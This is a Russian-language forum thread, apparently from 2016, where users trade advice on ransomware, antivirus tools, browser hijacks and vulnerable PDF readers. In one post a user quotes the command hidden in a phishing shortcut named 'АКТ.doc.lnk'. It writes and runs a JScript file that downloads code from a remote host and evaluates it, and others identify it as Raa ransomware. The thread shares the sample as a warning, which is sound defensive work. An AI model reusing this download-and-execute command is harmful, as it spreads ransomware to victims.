» Вирус(ы) в Windows XP,Vista,7,8,8.1. Проблемы. Решения.

Johnson007

Цитата:

Ни один (!!!) антивирус шифровальщик не детектит.

На момент его появления в системе и начала работы - шифрования, да. Но, ежели через диспетчер задач и контроль температуры камня (ней) и дисков отслеживать состояние системы, а при появлении необоснованной активности (резком повышении температуры процессора (ров) выявить в процессах причину (процессы шифровальщика имеют выделяющиеся цифробуквенные имена) и завершить его, то утилита "Зоркий глаз" заразу перехватит и остановит ее распространение на всех дисках и в т.ч. флехах.
Проверено на собственном опыте (ОСь ХР3) при заражении шифровальщиком с рекламной страницы алиекспресс на русфолдере. Вторым отреагировал Есет...)))
По причине, указанной ув. Johnson007

Цитата:

это всего-навсего исполняемый, причем исполняемый по желанию юзера, файл...

шифровальщики на автоуровне трудно уловимы, во всяком случае пока, надо быть внимательнее и приглядывать за состоянием машины...) С тех пор на время работы держу активным диспетчер задач и контроль температуры дисков и камня.

Johnson007
А где противоречие в моих словах? Я и сказал что антивирус не расшифровывает файлы с стойким алгоритмом шифрования, но утилиты от антивирусных компаний некоторые зашифрованные файлы могут расшифровать.Насчёт исполняемого файла читайте внимательнее, я написал вирус , а не шифровальщик (хотя в обиходе юзеры не различают эти понятия),имелись в виду не легитимные утилиты для шифрования , а непосредственно малварь которая загружает его в систему. Под шифровальщиком имелась в виду малварь которую детектят кто сигнатурно, а кто облачно, а кто и вовсе никак не детектит.
И кстати поведенческий анализ ещё никто не отменял.поставьте хитман про алерт и потестьте сами если не верите.

Можно ли запускать в DrWeb LiveCD сторонние программа?

Цитата:

Можно ли запускать в DrWeb LiveCD сторонние программа?

В принципе кое-какие виндовые приложения можно запускать через Wine, который есть на DrWeb LiveCD. Но всё подряд работать не будет, однозначно.
Вот например работает AdwCleaner, правда потом завершается с ошибкой.

Цитата:

Можно ли запускать в DrWeb LiveCD сторонние программа?

Если он на Linux'е, то можно, по логике, запускать бинарники, сделанные для Linux. А Wine на LiveCD антивируса для запуска Windows-программ — совершенно ненужный костыль.

Ребята новая угроза. в почту прислали файл АКТ.doc.lnk (типа тупо ярлык)
но в пути у ярлыка обнаружился интересный код

Код: %windir%\system32\cmd.exe /c REM.>as.js&echo var c=["Msxml2.ServerXMLHTTP.6.0","GET","http://say-bowbow.com/src/gate.php?a","open","send","responseText"];var er= new ActiveXObject(c[0]);er[c[3]](c[1],c[2],false);er[c[4]]();eval(er[c[5]]);>as.js&as.js

Не работает. http://say-bowbow.com/cgi-sys/suspendedpage.cgi?a - This Account has been suspended.

glass4217 12:09 18-07-2016
Цитата:

Ребята новая угроза. в почту прислали файл АКТ.doc.lnk (типа тупо ярлык) но в пути у ярлыка обнаружился интересный код

Это шифровальщик Raa, вот его описание.
KismetT_v3
ссылку на всякий случай деактивируйте, сервер может позже заработать.

Добавлено:
12:09 18-07-2016
Цитата:

в почту прислали файл АКТ.doc.lnk (типа тупо ярлык)

Дополню, что ярлык имеет иконку вордовского документа и двойное расширение типа doc.lnk как раз должно заставить пользователя думать, что это обычный вордовский документ. Как рабочая папка используется %temp%

По поводу данного вируса провел проверку, защита предложенная мной ранее защищает и от этой погани.



Также пожаловался антизверям те внесли эту дрянь в базы.

Хочу предупредить об опасных сайтах:
_http://uaproxy.com/
_http://aliveproxy.com/proxy-list/proxies.aspx/Ukraine-ua
Вместо анонимайзера выставляется опрос 2016 с единственной возможностью нажать Ок. Никакие кнопочки браузера не работают! Закрыть браузер можно только через Диспетчер задач.
Будьте осторожны!

Living thing
так зачем тогда активные ссылки оставлять? Деактивируйте их.

У меня даже на IE11 никакой опрос не вылезает.

Цитата:

У меня даже на IE11 никакой опрос не вылезает.

Первый доктор блокирует,поэтому насчет опроса ни чего сказать не могу,а на втором нет никакого опроса,только прокси лист.

Living thing

Цитата:

Будьте осторожны!

PaleMoon с uBlock - управление не теряется, вкладки с упомянутыми ссылками закрываются штатно.

Цитата:

Первый доктор блокирует,поэтому насчет опроса ни чего сказать не могу

Сейчас опрос пошёл на том же IE11. Развод голимый, но в плане заразы - ничего не было.

Сегодня серфил сайты MS через IE8 на Win7 SP1 (не все обновления стоят) под админом, внезапно IE упал, а после перезапуска его стартовая страница сменилась на что-то типа e*.clan.su. Я был уверен, что смотрел только сайт MS (искал инфу по KB-обновлениям), но теоретически могло открыться еще что-то. Подскажите, насколько это может быть серьезно? Cменить главную в IE может только эксплоит? Падение тоже было из-за него? Что сейчас стоит сделать, кроме проверки АВ?

Дык потому и надо IE обновлять (можно не обновлять систему, но IE - обязательно до последней доступной версии).

Проверьте парой разных АВ-сканеров, AdwCleaner'ом, поищите ссылки на подменный сайт в реестре (regscanner'ом сильно удобнее, чем вручную), удалите найденное.

Проверьте запущенные процессы онлайн (на ВирусТотале и WOT'е) с помощью CrowdInspect.

Проверьте автозагрузку с помощью AnVir Task Manager и OSAM - убейте лишнее.

Зачистите ТЕМР с перезагрузкой с помощью TFC by OldTimer (работает автоматически и без запросов подтверждений от юзера, поэтому перед запуском завершите работу во всех прикладных программах и закройте их).

Обновите плагины (Java, flash), смените Adobe Reader (если используете) на альтернативный PDF-просмотровщик (FoxitReader, SumatraPDF).

Добавлено:
Living thing
в K-Meleon есть первый опрос, но закрывается вкладка штатно. По второй ссылке - тот контент, что и подразумевается: список проксей.

Цитата:

на альтернативный PDF-просмотровщик FoxitReader

FoxitReader нынче уже не альтернатива, дыр не мало и в сплойтпаках на него эксплойты как правило есть.

KismetT_v3
А Foxit Phantom? Не знаю, меня эта программа устраивает.

Цитата:

меня эта программа устраивает.

Тех, кто зарабатывает, используя уязвимости софта, тоже устраивает. Просто следует знать, что судя по информации Kaspersky Lab, эксплойты среди всего зверья составляют порядка 1-1,5%.

KismetT_v3
Так она у меня просто установлена, использую её только при просмотре соответствующих файлов. В автозагрузке не висит. Или это не имеет значения?

Цитата:

Или это не имеет значения?

Ну если вы откроете PDF документ c эксплойтом для Foxit Phantom, то разницы нет, в автозагрузке он сидит или вы сами его запустите.

Несколько необычная проактивка для защиты от шифровальщиков:

софтинка создает папку с липовыми документами (ну т.е. просто набитыми инфомусором) и следит за ней - как только кто-то начинает шифровать в ней файлы (точнее, делать в них какие-то изменения - что практически исключает законную активность, ибо никому эти файлы заведомо не нужны, кроме потенциальной малвари), она находит исполняемый файл шифратора и предупреждает пользователя, остановив зловредный процесс, а по его команде делает дамп памяти в расчете на то, что ключ шифрования останется в этом дампе.
http://www.security-projects.com/?Anti_Ransom

Кто-нибудь пробовал :

https://www.nomoreransom.org/

проект для помощи жертвам шифрователей-вымогателей

https://eugene.kaspersky.ru/2016/07/27/aj-da-novosti-o-spasenii-mira-ot-shifrovatelej-i-o-luchshix-v-mire-issledovatelyax/

CopperField

Цитата:

создает папку с липовыми документами (ну т.е. просто набитыми инфомусором) и следит за ней

Когда мне довелось цепануть шифровальщика, после того как выцыпил его в процессах, завершил, сработал "Зоркий глаз", который его полностью на всех дисках убил, полез по папкам глянуть, что где нагадил. Так он - зараза начал мне шифровать файлы папок библиотеки, которые отсортированы в алфавитном порядке по темам, начал шифровать с конца, т.е. с я - языкознание... Пришлось удалить и пересобрать содержимое заново нескольких папок.)
Интересно

Цитата:

кто-то начинает шифровать в ней файлы

где будет находится папка файлов с инфомусором и чего и сколько до нее он успеет зашифровать?
А так, в целом интересное решение, но надо несколько файлов - папок с наименованиями с разных букв, чтобы перехватывать шифровальщика в начале процесса.)

moroka33
по ссылке есть же видео, из которого все понятно.

Вообще, есть общий совет на этот счет:
НИКОГДА не используйте предлагаемые системой дефолтные папки и средства сортировки документов (библиотеки). Это и раньше избавляло от самых разных проблем, а уж в эпоху шифровальщиков - просто обязательно.

Дело в том, что даже продвинутый шифровальщик, способный найти и испортить доки на несистемных и скрытых дисках, начинает свою работу с Рабочего стола и папки Мои документы, далее продолжает пользовательским профилем в целом и только потом идет дальше. А шифрование требует времени.

Я до нахождения разных проактивных методик защиты именно это советовал всем клиентам, причем предлагал им набить Мои документы заведомым ненужным мусором, чтобы шифровальщик пахал впустую.

Так вот именно появление подобной софтины не просто вписывается в эту концепцию, а делает ее законченной и автоматизированной. Она делает именно то, что нужно, да еще и следит за изменением файлов.

CopperField

Цитата:

НИКОГДА не используйте предлагаемые системой дефолтные папки и средства сортировки документов (библиотеки)

Не использую, библиотека создана самостоятельно не в дефолтном разделе имеет другое наименование...))) Шифровальщик начал работать одновременно на всех дисках с последних по алфавиту папок, выявил увидев резкий рост температуры камня открыл диспетчер и углядел несколько мутных по наименованию процссов, тока завершил первый остальные грохнул "Зоркий глаз"...)) Повторюсь - одновременно на всех дисках с папок последних по алфавиту.)
Логи "Зоркого глаза" сохранились, сейчас глянул, так Есет даже на текстовые файлы при открытии папки реагирует, тогда тоже проявился, но после Зоркого...)

Цитата:

Повторюсь - одновременно на всех дисках с папок последних по алфавиту

это еще один намек на то, что шифровальщик четко нацелен на Рунет: кириллица сортируется в системе всегда после латиницы.

Собственно, отсюда еще один логичный совет, который также имел смысл (по другим причинам) и в старые времена: не именуйте рабочие папки и файлы по-русски.

CopperField

Цитата:

не именуйте рабочие папки и файлы по-русски

Примем к сведению, но переименовывать влом - дюже много, не возьмусь...)

Помогите понять в чем дело...

есть 3 компа в сети(собственно вся сеть) на хр сп3, на каждом стоит дрвеб. за ними работают женщины, что качают и откуда - одному богу известно. но клянутся что всё по работе... эх...

в какой-то момент первый из них перестал выключаться, идет на перезагрузку. из безопасного режима выключение работало. прошло время и он уже перестал загружаться - на этапе загрузки, когда показывает лого винды - ребут. но в безопасный входил.

крутил-вертел, поднять комп не смог. всё переустановил. внезапно перестал выключаться второй комп, а затем и третий. третий уже не грузится - ребут. при этом первый снова перестал выключаться, а затем и загружаться.

симптомы одинаковые...
антивирусы ничего не находят. дрвеб, хитмэнпро, спайхантер, avz, mbam - ничего вообще, мелочевка в темпах, не более или следы всякие от рекламных трекеров(или как их там)..

как во сне... есть идеи?